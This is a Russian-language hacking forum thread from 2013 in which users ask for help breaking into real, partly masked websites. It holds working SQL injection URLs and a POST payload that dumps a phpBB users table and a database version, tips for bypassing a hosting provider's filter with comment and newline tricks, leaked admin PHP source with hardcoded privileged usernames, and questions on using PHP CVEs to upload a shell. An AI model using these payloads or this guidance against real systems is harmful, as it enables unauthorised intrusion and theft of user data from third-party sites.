Старый 23.04.2013, 01:01   #2851
Dr.D0z1k
 
Аватар для Dr.D0z1k
 
Регистрация: 20.04.2013
Сообщений: 6
Репутация: 0
По умолчанию

Имеется MySQL5 инъекция, мускул крутится на Win server 2008. Веб сервак - 80/tcp open http Microsoft IIS httpd 7.0.
file_priv=y, но кавычки не пролазят.
PHP - 5.2.17 (старый)
В нем есть этот баг: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0831
Тоесть можно отключить MQ? Если да - можно попробовать записать файл.
Есть варианты залится?

Еще удалось прочитать исходник:

admin/index.php
PHP код:
<?
include_once("../cfg.php");
NS::ExtractVars("user","pwd","a");

if(
Admin::ChkUser(@$_COOKIE["_authChkUser_"],@$_COOKIE["_authChkPwd_"]))
{
if (@
$_COOKIE["_authChkUser_"] == 'e@ug!ene_ok482' || @$_COOKIE["_authChkUser_"] == 'e@ka!terina_ab358' || @$_COOKIE["_authChkUser_"] == 'x@en!ia5_ve791')
{
header("Location: ".ROOT_ADMIN_HTTP."representatives.php");
}
else
{
header("Location: ".ROOT_ADMIN_HTTP."start.php");
}
}
elseif(!
$a)
{
ob_start();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=<?=Site::GetCharset()?>" />
<link rel="stylesheet" type="text/css" href="<?=CSS_ADMIN_HTTP?>styles.css" media="screen" />
</head>
<body>
<center>
<img src="<?=IMG_ADMIN_HTTP?>1x1.gif" width='1px' height='300px'>
<h1> <span class='red'>Project</span class='black'> <span>Manager</span> </h1>
<form action='<?=ROOT_ADMIN_HTTP?>index.php' method="POST">
<input type='hidden' name='a' value='enter'>
<table border='0'>
<tr><td align='right'>User:</td><td align='center'><input type='text' name='user' value='' maxlength='100'></td></tr>
<tr><td align='right'>Password:</td><td align='center'><input type='password' name='pwd' value='' maxlength='100'></td></tr>
<tr><td align='center' colspan='2'><input type='submit' value='Enter'></td></tr>
</table>
</form>
</center>
</body>
</html>
<?
$ret 
ob_get_clean();
echo 
$ret;
}
elseif(
$a == 'enter')
{
if(
Admin::ChkUser($usermd5($pwd)))
{
Cookie::Set("_authChkUser_",$user,time()+60*60*24);
Cookie::Set("_authChkPwd_",md5($pwd),time()+60*60*24);
if (
$user == 'e@ug!ene_ok482' || $user == 'e@ka!terina_ab358' || $user == 'x@en!ia5_ve791')
{
header("Location: ".ROOT_ADMIN_HTTP."representatives.php");
}
else
{
header("Location: ".ROOT_ADMIN_HTTP."start.php");
}
}
else
{
header("Location: ".ROOT_ADMIN_HTTP."index.php");
}
}
elseif(
$a == 'exit')
{
Cookie::Delete("_authChkUser_");
Cookie::Delete("_authChkPwd_");
header("Location: ".ROOT_ADMIN_HTTP."index.php");
}
die;
?>
Мне почему-то кажется, что он уязвим, не?

И ещё туда же:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823
5.2.17 - уязвим.
Цитата:
when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
в phpinfo()
Цитата:
Server API CGI/FastCGI
index.php?-s ничего не изменило. вай?
Спасибо.

Последний раз редактировалось Dr.D0z1k; 23.04.2013 в 01:55..
Dr.D0z1k вне форума   Ответить с цитированием
Старый 25.04.2013, 19:10   #2852
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

прочитай cfg.php
залезь через бэкдор в админку - _authChkUser_
погляди что делает ChkUser
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 25.04.2013, 23:38   #2853
Dr.D0z1k
 
Аватар для Dr.D0z1k
 
Регистрация: 20.04.2013
Сообщений: 6
Репутация: 0
По умолчанию

cfg.php не читабелен, пробовал в первую очередь...
Знания php не хватает , но я чувствовал что открытые пароли в коде могут быть полезными)
Как залезть в админку через бэкдор?
Цитата:
погляди что делает ChkUser
Как?

Спасибо
Dr.D0z1k вне форума   Ответить с цитированием
Старый 27.04.2013, 15:18   #2854
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Dr.D0z1k Посмотреть сообщение
cfg.php не читабелен, пробовал в первую очередь...
Знания php не хватает , но я чувствовал что открытые пароли в коде могут быть полезными)
Как залезть в админку через бэкдор?

Как?

Спасибо
Можно попробовать подбором, типа:
Код:
includes/admin.class.php
includes/Admin.class.php
includes/classes/admin.class.php
.......
lib/admin.php
lib/admin.class.php
В целом можно и из веба посканить данные файлы, и уже конечный файл попытаться прочитать.
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 28.04.2013, 06:33   #2855
Воришко
 
Регистрация: 17.03.2013
Сообщений: 17
Репутация: -7
По умолчанию

Хостинг sWeb, и SQL на сайте:
Код:
http://***.**/news.php?news_id=-1+union+select+1,count(*),3,4,5,6,7,8,9,10,11,12,13,14,15,16%0Afrom%0Aphpbb_users%0A--
Более трюк с %0A не работает, есть ли актуальные паблик способы обойти фильтр свеба? Если реально обойти его и выполнить запрос, подскажите как.
PS: данные только GET

Последний раз редактировалось Jokester; 14.05.2013 в 14:17..
Воришко вне форума   Ответить с цитированием
Старый 28.04.2013, 10:00   #2856
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Воришко Посмотреть сообщение
Хостинг sWeb, и SQL на сайте:
Код:
http://***.**/news.php?news_id=-1+union+select+1,count(*),3,4,5,6,7,8,9,10,11,12,13,14,15,16%0Afrom%0Aphpbb_users%0A--
Более трюк с %0A не работает, есть ли актуальные паблик способы обойти фильтр свеба? Если реально обойти его и выполнить запрос, подскажите как.
Там POST данные не фильтруются.
__________________
|

Последний раз редактировалось Jokester; 14.05.2013 в 14:17..
Boolean вне форума   Ответить с цитированием
Старый 28.04.2013, 17:57   #2857
Воришко
 
Регистрация: 17.03.2013
Сообщений: 17
Репутация: -7
По умолчанию

Цитата:
Сообщение от Boolean Посмотреть сообщение
Там POST данные не фильтруются.
Но POST\Cookie как правило отсутствуют. GET не обойти?
Воришко вне форума   Ответить с цитированием
Старый 28.04.2013, 21:03   #2858
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Цитата:
http://***.**/news.php
POST: news_id=1/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16/**/from/**/news#
4.1.22-lk-log
Где, что отсутствует? Все работает отлично и ничего не фильтруется, пробовать надо для начала.

Последний раз редактировалось Jokester; 14.05.2013 в 14:18..
cat1vo вне форума   Ответить с цитированием
Старый 29.04.2013, 11:49   #2859
wget
 
Аватар для wget
 
Регистрация: 16.06.2012
Сообщений: 33
Репутация: 5
По умолчанию

Кто-нибудь встречался с фильтром, который заменяет "SELECT" на "SEL ECT", "us_er" -> "us er", "database" -> "dat abase" и т.д.? Как обходить?
wget вне форума   Ответить с цитированием
Старый 29.04.2013, 12:48   #2860
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от wget Посмотреть сообщение
Кто-нибудь встречался с фильтром, который заменяет "SELECT" на "SEL ECT", "us_er" -> "us er", "database" -> "dat abase" и т.д.? Как обходить?
Наверное стоит всё таки дать URL.
__________________
|
Boolean вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot